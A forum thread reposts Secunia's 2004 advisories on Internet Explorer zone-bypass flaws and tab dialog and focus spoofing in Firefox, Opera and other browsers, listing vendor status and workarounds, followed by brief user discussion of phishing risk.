PSA: More Browser Vulnerabilities (IE, Firefox, et al)

[M11]

Earlier today, security consulting firm Secunia released details of exploits affecting both IE and non-IE browsers. Many users of non-Microsoft browsers may have a false sense of security, and will want to pay extra attention to the threat affecting their browsers identified in this thread. Although this is not a code execution exploit, or something similar, it still is worth taking seriously.
IE:

Description:
http-equiv has discovered two vulnerabilities in Internet Explorer, which can be exploited by malicious people to compromise a user's system, link to local resources, and bypass a security feature in Microsoft Windows XP SP2.

1) Insufficient validation of drag and drop events from the "Internet" zone to local resources for valid images or media files with embedded HTML code. This can be exploited by e.g. a malicious web site to plant arbitrary HTML documents on a user's system, which may allow execution of arbitrary script code in the "Local Computer" zone.

This vulnerability is a variant of:
SA12321

NOTE: Microsoft Windows XP SP2 does not allow Active Scripting in the "Local Computer" zone.

2) A security zone restriction error, where an embedded HTML Help control on e.g. a malicious web site references a specially crafted index (.hhk) file, can execute local HTML documents.

NOTE: This will also bypass the "Local Computer" zone lockdown security feature in SP2.

The two vulnerabilities in combination with an inappropriate behaviour where the ActiveX Data Object (ADO) model can write arbitrary files can be exploited to compromise a user's system. This has been confirmed on a fully patched system with Internet Explorer 6.0 and Microsoft Windows XP SP2.

Solution:
Disable Active Scripting or use another product.

http://secunia.com/advisories/12889

Microsoft does not offer a fix for this yet.

Other Browsers:

Vulnerability "A"
It is possible for a inactive tab to spawn dialog boxes e.g. the
JavaScript "Prompt" box or the "Download dialog" box, even if the user
is browsing/viewing a completely different web site in another tab.

The problem is that the browsers does not indicate, which tab launched
the dialog boxes, which therefore could lead the user into disclosing
information to a malicious web site or to download and run a program,
which the user thought came from another trusted web site e.g. their
bank.

You may test the first vulnerability here

Vulnerability "B"
It is possible for a inactive tab to always gain focus on a form
field in the inactive tab, even if the user is browsing/viewing a
completely different web site in another tab.

This is escalated a bit by the fact that most people do not look at
the monitor while typing data into a form field, and therefore might
send data to the site in the inactive tab, instead of the
intended/viewed tab.

Here are the solutions for the above problems:

4) Solution

Mozilla:
Vulnerability "A":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.


Mozilla Firefox:
Vulnerability "A":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.


Camino:
Vulnerability "A":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Not affected by this vulnerability.


Opera:
Vulnerability "A":
Will be fixed in Opera 7.60.
Until Opera 7.60 becomes available, Opera Software will release an
advisory on this issue, which will be available on the Opera
website.

Vulnerability "B":
Not affected by this vulnerability.


Avant Browser:
Vulnerability "A":
Vulnerable. However, vendor never responded to inquiries.

Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Vulnerable. However, vendor never responded to inquiries.
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.


Konqueror:
Vulnerability "A":
The Vendor reports that KDE version 3.3.1 fixes this
vulnerability.

Vulnerability "B":
Not affected by this vulnerability.


Netscape:
Vulnerability "A":
Vulnerable. However, vendor never responded to inquiries.
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Vulnerable. However, vendor never responded to inquiries.
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.


Maxthon:
Vulnerability "A":
Will be fixed in an upcoming version.
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Will be fixed in next version.
Disable JavaScript or do not visit untrusted and trusted websites

http://secunia.com/secunia_research/2004-10/advisory

Browser manufacturers are curringly preparing a bugfix for the non-IE exploit. In the meantime, Secunia recommends changing scripting preferences and habits to lessen the potential of becoming a victim. Currently no sites have been discovered using this, but may soon. This second exploit is of special interest to identity theives, who may fool a user into viewing his site at the same time as the user checks email/banks/visits paypal.

The non-IE browsers may be used in safety as long as secure websites are visited alone, as opposed to with other, possibly unsafe sites in the background. Simple Fix: Don't randomly browse the internet or look at porn while using a secure website. Case closed.

 

[M11]

<reserved>

 

[vinnie]

Earlier today, security consulting firm Secunia released details of exploits affecting both IE and non-IE browsers. Many users of non-Microsoft browsers may have a false sense of security, and will want to pay extra attention to the threat affecting their browsers identified in this thread.

Lollerberries...

 

[lomn75]

Simple Fix: Don't randomly browse the internet or look at porn while using a secure website. Case closed.

Yeah, I read the notes for these earlier and can't for the life of me figure out how a deliberate phishing scam could take advantage of it. It's a dumb-luck sort of exploit.

<cynicism>No doubt some people will trumpet it as evidence that everything but IE is hopelessly flawed, just like some post yesterday noting how malformed HTML could crash Mozilla</cynicism>

 

[M11]

Yeah, I read the notes for these earlier and can't for the life of me figure out how a deliberate phishing scam could take advantage of it. It's a dumb-luck sort of exploit.

A site with a paypal donate link could get you to open a window to paypal......

<cynicism>No doubt some people will trumpet it as evidence that everything but IE is hopelessly flawed, just like some post yesterday noting how malformed HTML could crash Mozilla</cynicism>

IE and non-IE both contain flaws in this thread. I also hope that nobody derails it.

 

[lomn75]

A site with a paypal donate link could get you to open a window to paypal....

I was going to say "but not in a tab" -- but I suppose some people are running SDI mode, which would open the tab. Makes sense now.